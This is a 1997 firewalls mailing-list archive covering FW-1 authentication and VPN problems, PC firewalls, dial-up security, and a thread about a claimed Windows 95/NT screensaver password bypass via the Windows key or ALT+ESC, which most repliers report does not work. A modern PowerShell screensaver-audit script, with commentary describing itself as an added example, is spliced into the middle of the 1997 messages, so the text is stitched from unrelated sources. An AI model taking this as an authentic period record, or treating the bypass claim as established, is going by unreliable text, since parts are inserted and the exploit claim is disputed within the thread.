10.01 series 700. 1. This is the rule base : source destination service action track anyusers@any any HTTP User Authentication Long I have set the proxy from the client machine with the Firewall's IP Address. 
and then the dialog authentication shows up, and I fill in the username= "andy" and password ="andy", and from the browser shows an error message : Error 407 FW-1 at Firewall : Unauthorized to access the document. . Authorization is needed for Fw-1 . The authentication required by Fw-1 for andy is : unix password . Reason for failure of last attempt : fw-1 rule. From the book "Firewall Architecture and admin", It says that the firewall-1 password was correct, but the user was not authorized because there was no matching rule in the rule base. So ? Anybody know the solution, if we get an error message like that ? 2. From the log file, The HTTP service is accepted bye the firewall (green color), but below that log statement, the firewall shows a reject statement (red color), and it is rejected bye the daemon. This is the log statement : I/F Action SRC DST Rule Port Info Len 0 HTTP client firewall 3 1288 len 44 Daemon reject symbol - - - - - The question is, what do the daemon do ? Why do the daemon show the reject symbol ? 3. Same rule base like no. 1, I compile the rule base, and the firewall machine show the " Install Security Policy" Dialog, and I have choosen the gateway bye pressing "Apply button", and the question are : a. There is an error message : ..... compiled ok. ---> "Host Addr (Firewall) failed." ---> "Authentication For command refresh failed" load firewall ...... succedded What does it mean ? b. It usually takes short time when compile the rule base without HTTP Authentication. But It is rather strange, why it takes longer time when using HTTP Authentication? 4. There is an error message too, from the XTerminal : "XView warning menu_show : unable to grab pointer (command menu package) XView warning menu_show : unable to grab keyboard (command menu package) What does it mean ? 5. Do the Fw-1 support for FTP service , using anonymous login ? FYI, I try using FTP2000, WSFTP, but It always fail. 
I say thank you very much for the solution answering all the questions. Best regards, Andy From firewalls-owner Wed Jan 15 01:33:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA12844 for firewalls-outgoing; Wed, 15 Jan 1997 00:16:55 -0800 (PST) Received: from mail.rijnhaave.nl (mail.rijnhaave.nl [194.151.56.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA12803 for ; Wed, 15 Jan 1997 00:15:49 -0800 (PST) Received: from frank.rijnhaave.nl (alfa.rijnhaave.nl [194.151.56.61]) by mail.rijnhaave.nl (8.7.5/8.7.3) with SMTP id JAA04862; Wed, 15 Jan 1997 09:13:16 +0100 (MET) Message-Id: <3.0.32.19970115091238.0069928c@mail.rijnhaave.nl> X-Sender: frank@mail.rijnhaave.nl X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 15 Jan 1997 09:12:44 +0100 To: palan@dataprep.com.my From: Frank Schuurman Subject: Re: WIN'95 FLAW Cc: firewalls@GreatCircle.COM, diederik.quant@sanderink.nl, ernst.haaksman@sanderink.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:56 PM 1/14/97 -0800, you wrote: Hi, I use the 400.950 UK version of win95 >If the Windows'95 Screen saver is active, you can break into without any >password and all you have to do is : press the "windows" logo key (printed >on the M$ keyboard) and there you are. This works only with third party screensavers for me. The 'flying windows' is only responding with the password dialog box. >If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have >tried this with my own PC and my friends. It works.....try on your own PC. Just the same story as above. >Unfortunately, this flaw can be found in M$ Windows NT as well, both >SERVER and WORKSTATION (it works with any screen saver, even >those that do not ship with the product.) I would also be interested in >any known patch or fix, as I just started deploying NT throughout my >enterprise! With versions of NT ? 
3.5x or 4.x..... >I will try that screen saver start and i put Ctrl+Alt+Delete and >i kill screen saver ....that is killed...:-) Even that will only work for me with third party screen savers. Gr. Frank -------------------------------------------------------------------- Frank Schuurman | Private Internet Technical Proffessional | | Syntegra Internet Services | fschuurman@compuserve.com Louis Braillelaan 6 | 100276.2570@compuserve.com 2719 EJ Zoetermeer | frank@spid.xs4all.nl Tel : 079-368 22 22 | frank.schuurman@pi.net Fax : 079-368 24 18 | fs@sanderink.nl Email: frank.schuurman@syntegra.net | -------------------------------------------------------------------- From firewalls-owner Wed Jan 15 01:41:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA07220 for firewalls-outgoing; Tue, 14 Jan 1997 23:20:36 -0800 (PST) Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA07185 for ; Tue, 14 Jan 1997 23:20:24 -0800 (PST) Received: from daniels.nmac.ericsson.se (daniels.nmac.ericsson.se [130.100.187.35]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with SMTP id IAA00235 for ; Wed, 15 Jan 1997 08:19:10 +0100 (MET) Received: from negrita. by daniels.nmac.ericsson.se (SMI-8.6/SMI-SVR4) id IAA04939; Wed, 15 Jan 1997 08:17:26 +0100 Received: by negrita. (SMI-8.6/SMI-SVR4) id IAA02352; Wed, 15 Jan 1997 08:19:08 +0100 Date: Wed, 15 Jan 1997 08:19:08 +0100 From: etxrosd@nmac.ericsson.se (Robert Stahlbrand) Message-Id: <199701150719.IAA02352@negrita.> To: firewalls@GreatCircle.COM Subject: Re: WIN'95 FLAW Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: wD9oOqKgKx/DBuubXEPXPg== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It does not work for me either! 
It's not very likely that M$ would implement such an easy way to bypass the password-protected screensaver in W95. I never heard of it before and this kind of stuff usually leaks out to the masses very fast. "windows" logo-key and ALT+ESC is two of the first things I would try (and probably did a year ago) and the fact that noone tried this before isn't very likely! Am I wrong? /Robert ########################################################### # Robert Stahlbrand # # Network and System Administrator OPLab and NMAC domains # # # # Ericsson Telecom AB # # Box 333 # # 43184 Molndal # # Sweden # # +46 31 676162 # # # # robert@nmac.ericsson.se # ########################################################### > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > This does not work for me, I've not tried to switch over to the English > keyboard yet (I'm using Icelandic). 
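Most of the replies in this thread boil down to "it does not reproduce here", and one poster later asks the question that actually decides it: was the saver's password option turned on at all? The PowerShell check below is an added example, not code from any poster, and it answers that from the registry rather than by pressing keys. Everything in it is an assumption relative to the thread: the function name, the per-user key HKCU:\Control Panel\Desktop and its value names (ScreenSaveActive, ScreenSaverIsSecure, ScreenSaveTimeOut, SCRNSAVE.EXE) as used by the NT family, the Windows 9x-era value ScreenSaveUsePassword, the Group Policy override key under HKCU:\Software\Policies, and the 10-minute idle threshold.

```powershell
# Added example (not from the thread): decide whether the screen saver on this
# user's session is active, password-protected and armed with a sane timeout.
# Group Policy values, when present, win over the user's own settings, so the
# policy key is consulted first for every value.

function Get-ScreenSaverPolicy {
    param(
        # Assumed local policy: the saver must arm within 10 minutes of idle time.
        [int]$MaxTimeoutSeconds = 600
    )

    $userKey   = 'HKCU:\Control Panel\Desktop'
    $policyKey = 'HKCU:\Software\Policies\Microsoft\Windows\Control Panel\Desktop'

    # Return the first definition of a value (policy key first) with its source,
    # or $null when it is set nowhere.
    function Read-Setting([string]$Name) {
        foreach ($key in @($policyKey, $userKey)) {
            if (-not (Test-Path $key)) { continue }
            $item = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
            if ($null -ne $item -and $null -ne $item.$Name) {
                return [pscustomobject]@{ Value = [string]$item.$Name; Source = $key }
            }
        }
        return $null
    }

    $active  = Read-Setting 'ScreenSaveActive'
    $secure  = Read-Setting 'ScreenSaverIsSecure'    # NT-family name: "1" = password on resume
    $legacy  = Read-Setting 'ScreenSaveUsePassword'  # Windows 9x-era name; assumed to survive on old images
    $timeout = Read-Setting 'ScreenSaveTimeOut'      # idle seconds before the saver starts
    $exe     = Read-Setting 'SCRNSAVE.EXE'

    $findings = @()

    $isActive = ($null -ne $active -and $active.Value -eq '1')
    if (-not $isActive) { $findings += 'screen saver is not active' }

    $exeName = if ($null -ne $exe) { $exe.Value } else { $null }
    if ([string]::IsNullOrWhiteSpace($exeName)) { $findings += 'no screen saver executable configured' }

    $passwordOn = ($null -ne $secure -and $secure.Value -eq '1') -or
                  ($null -ne $legacy -and $legacy.Value -eq '1')
    if (-not $passwordOn) { $findings += 'password protection on resume is off' }

    $seconds = 0
    if ($null -eq $timeout -or -not [int]::TryParse($timeout.Value, [ref]$seconds) -or $seconds -le 0) {
        $findings += 'no usable idle timeout'
    } elseif ($seconds -gt $MaxTimeoutSeconds) {
        $findings += "idle timeout of $seconds s exceeds the assumed maximum of $MaxTimeoutSeconds s"
    }

    # A value that exists only under the user key is the user's to change; only a
    # policy-sourced ScreenSaverIsSecure means the lock is enforced on them.
    $enforced = ($null -ne $secure -and $secure.Source -eq $policyKey)

    [pscustomobject]@{
        Active           = $isActive
        PasswordOnResume = $passwordOn
        EnforcedByPolicy = $enforced
        TimeoutSeconds   = $seconds
        ScreenSaverExe   = $exeName
        Compliant        = ($findings.Count -eq 0)
        Findings         = $findings
    }
}

Get-ScreenSaverPolicy | Format-List
```

Run it in the session of the user being checked, since all of these values are per-user. A result with PasswordOnResume true but EnforcedByPolicy false is the state the thread is arguing about: the dialog appears, but the user can switch it off, and any "bypass" report from such a machine needs the setting re-verified before it is believed. On a 1997-era Windows 95 box the same values would have had to be read with regedit; PowerShell did not exist yet.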
From firewalls-owner Wed Jan 15 03:18:59 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA28852 for firewalls-outgoing; Wed, 15 Jan 1997 02:33:25 -0800 (PST)
Received: from gk-blue.unicc.org (gk-red.unicc.org [192.91.247.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA28801 for ; Wed, 15 Jan 1997 02:33:01 -0800 (PST)
From: admin@unicc.org
Received: by gk-blue.unicc.org; (5.65v3.2/1.3/10May95) id AA27472; Wed, 15 Jan 1997 11:34:17 +0100
Received: by gh-old.unicc.org (5.65/jsb-190694); id AA13710; Wed, 15 Jan 1997 11:34:06 +0100
Message-Id: <9701151034.AA13710@gh-old.unicc.org>
To: firewalls@greatcircle.com
Subject: Other VPN products
Date: Wed, 15 Jan 97 11:34:00 +0100
X-Mts: smtp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm looking for more information on available VPN products. I implemented AltaVista Tunnel and think it's a good product, but still would like to be sure that I didn't miss any better offer. Did anybody try any other solutions?

Thanks,
Lilia

From firewalls-owner Wed Jan 15 08:39:21 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA00282 for firewalls-outgoing; Tue, 14 Jan 1997 15:33:21 -0800 (PST)
Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA01560 for ; Tue, 14 Jan 1997 15:13:24 -0800 (PST)
Received: from localhost (fangyou2@localhost) by panix3.panix.com (8.8.4/8.7/PanixU1.3) with SMTP id SAA16086; Tue, 14 Jan 1997 18:13:15 -0500 (EST)
Date: Tue, 14 Jan 1997 18:13:14 -0500 (EST)
From: FaNgYoU2
Reply-To: FaNgYoU2
To: "John H. Stewart"
cc: firewalls@GreatCircle.com
Subject: Re: McCaffee PC Firewall
In-Reply-To: <199701132003.MAA02314@bounty.sssd.navy.mil>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> You wrote:
> > ... Several of the Intranets where I have done
> > performance tuning had a need for something like a PC firewall in
> > areas of higher level administration, budget and finance ...
> ...
> Even having it installed on a separate PC begs the question of Why?
> Elsewhere on the network, a corporate firewall exists. Why add a
> backdoor??

A lot of strange stuff shows up when I do performance tuning on networks. The owners usually have no idea of all the stuff that is running on there. Several times I have seen and traced what can be politely called corporate espionage.

The Intranets I work on typically have good firewalls between themselves and the Internet and nobody is coming in from the Internet. The problem is with people who got access to the internal network through some legitimate avenue.

The internal firewall on a PC would not be connected to anything except the corporate LAN. The firewall software would protect the data inside the PC (Windows 95, Windows NT Workstation) from other people on the corporate LAN who are trying to get into it.

The people who own networks where I see this need for a PC firewall can easily afford dual Pentium processors, 128 MB RAM and 5 to 8 gigabytes of disk space. The data stored in the PC would be highly sensitive political, economic or financial data. The first attempt at an agency budget projection, for example. So the impact of the firewall software on the PC is not a major performance factor for the owner. A department that doesn't have any sensitive stuff might use an equivalent PC as a server.

^ ^ A slight gray shadow on a misty day, against a gray winter sky

From firewalls-owner Wed Jan 15 09:21:27 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA06360 for firewalls-outgoing; Wed, 15 Jan 1997 03:54:03 -0800 (PST)
Received: from mail.fluidsysuk.epcorp.com (stuka.epcorp.com [194.216.7.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA06288 for ; Wed, 15 Jan 1997 03:53:15 -0800 (PST)
Received: from roamingpc.fluidsysuk.epcorp.com by mail.fluidsysuk.epcorp.com id aa00688; 15 Jan 97 11:45 GMT
Message-Id: <3.0.32.19970115064812.00691cac@hurry.fluidsysuk.epcorp.com>
X-Sender: martinw@hurry.fluidsysuk.epcorp.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 15 Jan 1997 06:48:13 -0500
To: firewalls@greatcircle.com
From: "Martin C. Walker"
Subject: ANYONE RUNNING FW-1 VPN PLEASE CONTACT ME !!!!!
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If anyone out there is running FW-1 VPN on any platform please let me know what platform. Also, if you're running VPN and NAT please, please let me know. I have a few questions (see earlier mail).

From firewalls-owner Wed Jan 15 09:26:49 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA08891 for firewalls-outgoing; Wed, 15 Jan 1997 04:31:11 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA08826 for ; Wed, 15 Jan 1997 04:30:31 -0800 (PST)
Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id EAA20540; Wed, 15 Jan 1997 04:28:49 -0800 (PST)
Message-Id: <3.0.32.19970115072847.006ac320@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 15 Jan 1997 07:28:52 -0500
To: Jarn Calubiran <920145@balut.admu.edu.ph>
From: Paul Ferguson
Subject: Re: Firewalls for dial-up access
Cc: firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:19 PM 1/15/97 -0800, Jarn Calubiran wrote:
>
> I apologize beforehand if I missed a discussion on this but most
>of the things I've been hearing from this list concern protecting the
>network from the outside. How about protecting the network from the inside
>in the case where you have dial-up lines into your network. I am aware
>that some dial-up servers perform strong authentication but what if you
>really want the dial-up access to be essentially "isolated" from the
>network. How is this implemented.
>
> Thanks in advance...

Conventional wisdom indicates that dial-up access is located adjacent to the internal network, behind the firewall, and security is provided by authorization, authentication, one-time passwords, and perhaps even call-back.

- paul

--
Paul Ferguson                 ||        ||
Consulting Engineering        ||        ||
Herndon, Virginia USA        ||||      ||||
tel: +1.703.397.5938      ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com  c i s c o  S y s t e m s

From firewalls-owner Wed Jan 15 09:40:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA06361 for firewalls-outgoing; Wed, 15 Jan 1997 03:54:06 -0800 (PST)
Received: from mail.fluidsysuk.epcorp.com (stuka.epcorp.com [194.216.7.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA06266 for ; Wed, 15 Jan 1997 03:53:07 -0800 (PST)
Received: from roamingpc.fluidsysuk.epcorp.com by mail.fluidsysuk.epcorp.com id aa00674; 15 Jan 97 11:42 GMT
Message-Id: <3.0.32.19970115064542.00691cac@hurry.fluidsysuk.epcorp.com>
X-Sender: martinw@hurry.fluidsysuk.epcorp.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 15 Jan 1997 06:45:44 -0500
To: firewalls@greatcircle.com
From: "Martin C. Walker"
Subject: FW-1 VPN Doesn't Work (Checkpoint and Sun stumped) anyone help ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi All!

Blimey! FW-1 has more bugs than sendmail ;-> Well, ok maybe not THAT many!

Anyway I'm in dire need of help! I'm over here in jolly old England deploying a 2nd FW-1/Solaris x86 machine. FW-1 is 2.1a (Sun's latest release) and Solaris 2.5.1 x86.

We cannot get the firewall here and the (same) one in the US to exchange keys. Each machine is set up as its own CA (i.e. FW-A CA defined as "local" on FW-A and "remote, FW-B" on FW-B. FW-B is set up in the same fashion). I can get both CA keys exchanged. I can get ONE machine to send its encryption key to the other, but I can't get the final encryption key exchanged. Instead I get "Certificate Authority (FW-A) does not have key defined for FW-A".

We are running a VERY simple NAT configuration, one rule which just hides everything behind the EXTERNAL address of the respective firewall. The rule base is "any, any, any accept" - can't be much simpler than that.
If anyone has any ideas pls let me know..... btw I am sure this is NOT a config problem but if you have any idea... I spent ALL YESTERDAY on the phone with the best support person Sun has to offer and some guy from Checkpoint too.... they were stumped (and my bloody ear hurts too from the phone :-()

I'd also like to hear from ANYONE who is running VPN and NAT with FW-1 on any platform. Sun and Checkpoint as much as told me that NO-ONE is doing it on my platform; they certainly didn't test it!

From firewalls-owner Wed Jan 15 19:31:35 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA07767 for firewalls-outgoing; Wed, 15 Jan 1997 04:13:35 -0800 (PST)
Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA07618 for ; Wed, 15 Jan 1997 04:12:22 -0800 (PST)
Received: from daniels.nmac.ericsson.se (daniels.nmac.ericsson.se [130.100.187.35]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with SMTP id NAA00182 for ; Wed, 15 Jan 1997 13:11:19 +0100 (MET)
Received: from negrita. by daniels.nmac.ericsson.se (SMI-8.6/SMI-SVR4) id NAA05317; Wed, 15 Jan 1997 13:09:33 +0100
Received: by negrita. (SMI-8.6/SMI-SVR4) id NAA02544; Wed, 15 Jan 1997 13:11:16 +0100
Date: Wed, 15 Jan 1997 13:11:16 +0100
From: etxrosd@nmac.ericsson.se (Robert Stahlbrand)
Message-Id: <199701151211.NAA02544@negrita.>
To: firewalls@greatcircle.com
Subject: Re: HTTP Authentication
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-MD5: +VMIWDHXJTpvVrx4On4XsA==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi there!

These are my guesses...

> Item Subject: Message text
> Hello everybody,
>
> I have a few questions when installing FW-1 Ver 2.1a running on HPUX Rel.
> 10.01 series 700.
>
> 1. This is the rule base:
>
> source destination service action track
> anyusers@any any HTTP User Authentication Long
>

Funny rule. Just for test I suppose....

> I have set the proxy from the client machine with the Firewall's IP
> Address, and then the authentication dialog shows up, and I fill in the
>
> username="andy" and password="andy", and the browser shows an
> error message:
>
> Error 407
> FW-1 at Firewall: Unauthorized to access the document.
> . Authorization is needed for Fw-1
> . The authentication required by Fw-1 for andy is: unix password
> . Reason for failure of last attempt: fw-1 rule.
>
> From the book "Firewall Architecture and admin", it says that the
> firewall-1 password was correct, but the user was not authorized
> because there was no matching rule in the rule base.
>
> So? Anybody know the solution, if we get an error message like that?
>

Have you inserted the web server's address in "properties", "authentication", HTTP-servers? If not, it won't work.

> 2. From the log file, the HTTP service is accepted by the firewall (green
> color), but below that log statement, the firewall shows a reject
> statement (red color), and it is rejected by the daemon.
>
> This is the log statement:
>
> I/F Action SRC DST Rule Port Info Len
> 0 HTTP client firewall 3 1288 len 44
> Daemon reject symbol - - - - -
>
> The question is, what does the daemon do? Why does the daemon show the
> reject symbol?

It's a two-step procedure! The user is accepted by the proxy (the user andy exists on the proxy with UNIX authentication) but he just doesn't know which web server to contact! The firewall needs to have a list of valid firewalls in the system (see above).

> 3. Same rule base as no. 1,
> I compile the rule base, and the firewall machine shows the "Install
> Security Policy" dialog, and I have chosen the gateway by pressing the
> "Apply" button, and the questions are:
>
> a. There is an error message:
> .....
> compiled ok.
> ---> "Host Addr (Firewall) failed."
> ---> "Authentication For command refresh failed"
> load firewall ...... succeeded
>
> What does it mean?
>

I don't know!

> b. It usually takes a short time to compile the rule base without HTTP
> Authentication. But it is rather strange, why does it take a longer time
> when using HTTP Authentication?

This is strange! I don't notice any delay on my firewall! It must be the HP-UX unix system. It sucks! (this was a joke)

> 4. There is an error message too, from the X terminal:
>
> "XView warning menu_show: unable to grab pointer (command menu package)
> XView warning menu_show: unable to grab keyboard (command menu package)
>
> What does it mean?
>

I have seen it a lot but never done anything against it! Does it appear frequently?

> 5. Does Fw-1 support the FTP service using anonymous login?
> FYI, I tried using FTP2000, WSFTP, but it always fails.
>

No, it does not support anonymous ftp as a special case but of course it supports ftp. Anonymous ftp is just a special case of ftp (same port) and can be created on any UNIX system with not very much work. What you need to do is to create a special account on the UNIX system you deal with called ftp with no password and a lot more. See the manpages on ftpd. It includes a bourne-shell script which is very useful when creating the anonymous ftp server. And of course, you cannot have any user authentication in your firewall for ftp!

> I say thank you very much for the solution answering all the questions.
>
> Best regards,
> Andy

From firewalls-owner Wed Jan 15 19:32:45 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA03629 for firewalls-outgoing; Wed, 15 Jan 1997 03:24:23 -0800 (PST)
Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA03608 for ; Wed, 15 Jan 1997 03:23:57 -0800 (PST)
Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id TAA22964; Wed, 15 Jan 1997 19:21:50 -0800
Date: Wed, 15 Jan 1997 19:21:50 -0800
From: drexx@sunphil.mozcom.com (Dexter D. Laggui)
Message-Id: <199701160321.TAA22964@sunphil.sunphil.mozcom.com>
To: firewalls@greatcircle.com
Subject: Re: WIN'95 FLAW
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello world, Jan. 15, '97 (07:21 pm, Manila time)

This does not work for us. We tested it on the M$ Win 95 and the NT Server 3.51 using the ALT+ESC combo. What version do you refer to? I wish it's all true for me );^]

The Drexxman.

"It's a dirty job, but somebody's gotta do it." -- John Wayne

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
DEXTER D. LAGGUI
Systems Engineer, Systems Integration Division
PHILIPPINE SYSTEMS PRODUCTS INC.
Penthouse, Corporate Business Center
150 Paseo de Roxas Ave., Legaspi Village
Makati City, Philippines
Phone: (++632) 813-6453 to 55 loc. 222
Fax: (++632) 813-3516
Email: drexx@sunphil.mozcom.com
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~

|| Subject: WIN'95 FLAW
|| Author: PaLaN at INTERNET-MAIL
|| Date: 1/14/97 2:56 PM
||
|| Howdy,
||
|| I just encountered a security (I would call it) flaw in M$ Windows'95
|| screensaver!!
|| I don't know if any of you encountered this or not but here
|| it goes:
||
|| If the Windows'95 Screen saver is active, you can break in without any
|| password and all you have to do is: press the "windows" logo key (printed
|| on the M$ keyboard) and there you are.
||
|| If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
|| tried this with my own PC and my friends. It works..... try on your own PC.
||
|| Hmmm.... M$ still the "King Of Buggy" err... I don't intend to flame M$ here
|| ok..! Let me know if any of you encountered this.
||
|| I'm going to send M$ a mail on this bug but before that, I need to know
|| whether any patch is available for this... thx.
||
|| rgds,
|| PaLaN

From firewalls-owner Wed Jan 15 19:33:36 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20251 for firewalls-outgoing; Wed, 15 Jan 1997 08:02:48 -0800 (PST)
Received: from gw.lsli.com (gw.lsli.com [206.50.87.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA20234 for ; Wed, 15 Jan 1997 08:02:31 -0800 (PST)
From: firstcat@lsli.com
Received: by gw.lsli.com id AA24273; Wed, 15 Jan 1997 09:56:20 -0600
Received: by lsli.com via smwrap Version 2.2 id smwrapWc8Ac5; Wed Jan 15 09:55:26 1997
Date: Wed, 15 Jan 97 09:55:03
Subject: Lucent Tech Firewall Courses
To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Here is the calendar for the upcoming Lucent Tech firewall courses (SA5010). For more information on this course and other Lucent networking and security courses visit their web site at http://www.attsa.com or call them at 800 617 0066 and 210 681 5050

Jan 27-31
Feb 10-14
Feb 24-28
Mar 10-14
Mar 24-28

Cheers
Jay

-------------------------------------
Jay Lyall
Channel Sales Director
Livermore Software Laboratories, Intl.
2825 Wilcrest, Suite 160
Houston, Texas 77042-3358
1-713-974-3274
jay@lsli.com
Date: 1/15/97
Spectacle is not reality
-------------------------------------

From firewalls-owner Wed Jan 15 19:43:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA23239 for firewalls-outgoing; Wed, 15 Jan 1997 08:58:21 -0800 (PST)
Received: from gateway2.ey.com (gateway2.ey.com [199.50.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA23222 for ; Wed, 15 Jan 1997 08:58:01 -0800 (PST)
From: KEN.BOYDSTUN@EY.COM
Received: by gateway2.ey.com id AA00801 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Wed, 15 Jan 1997 11:56:59 -0500
Received: by gateway2.ey.com (Protected-side Proxy Mail Agent-2); Wed, 15 Jan 1997 11:56:59 -0500
Received: by gateway2.ey.com (Protected-side Proxy Mail Agent-1); Wed, 15 Jan 1997 11:56:59 -0500
To: " - (052)firewalls (a) greatcircle.com"
Message-Id: <0014500001756429000002L092*@MHS>
Date: Wed, 15 Jan 1997 11:54:19 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone out there know of any weaknesses of the Raptor firewalls?

Thanks

From firewalls-owner Wed Jan 15 19:47:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA22027 for firewalls-outgoing; Wed, 15 Jan 1997 08:37:32 -0800 (PST)
Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA21989 for ; Wed, 15 Jan 1997 08:37:11 -0800 (PST)
Received: from West.Sun.COM ([129.153.100.30]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id IAA28076 for ; Wed, 15 Jan 1997 08:34:56 -0800
Received: from plato.West.Sun.COM by West.Sun.COM (SMI-8.6/SMI-5.3) id IAA12415; Wed, 15 Jan 1997 08:34:31 -0800
Received: by plato.West.Sun.COM (SMI-8.6/SMI-SVR4) id IAA26570; Wed, 15 Jan 1997 08:37:50 -0800
Date: Wed, 15 Jan 1997 08:37:50 -0800
From: matt@plato.West.Sun.COM (Matthew Archibald)
Message-Id: <199701151637.IAA26570@plato.West.Sun.COM>
To: firewalls@greatcircle.com, 920145@balut.admu.edu.ph
Subject: Re: Firewalls for dial-up access
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: Jarn Calubiran <920145@balut.admu.edu.ph>

From firewalls-owner Wed Jan 15 20:04:58 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA21066 for firewalls-outgoing; Wed, 15 Jan 1997 08:19:54 -0800 (PST)
Received: from gatekeeper.mcimail.com (gatekeeper.mcimail.com [192.147.45.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA21030 for ; Wed, 15 Jan 1997 08:19:39 -0800 (PST)
Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id QAA20355; Wed, 15 Jan 1997 16:15:13 GMT
Received: from mcimail.com by mailgate.mcimail.com id ag25423; 15 Jan 97 16:20 WET
Date: Wed, 15 Jan 97 11:19 EST
From: Peter Ngo
To: firewalls , Robert Stahlbrand
Subject: Re[2]: WIN'95 FLAW
Message-Id: <02970115161920/0007044148PJ4EM@MCIMAIL.COM>
X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I tried and it did not work both on the Win95 platform (Plus pack installed) and the WinNT platform (4.0). Was the option "password protected" turned on? ....

Peter Ngo

From firewalls-owner Wed Jan 15 20:10:13 1997
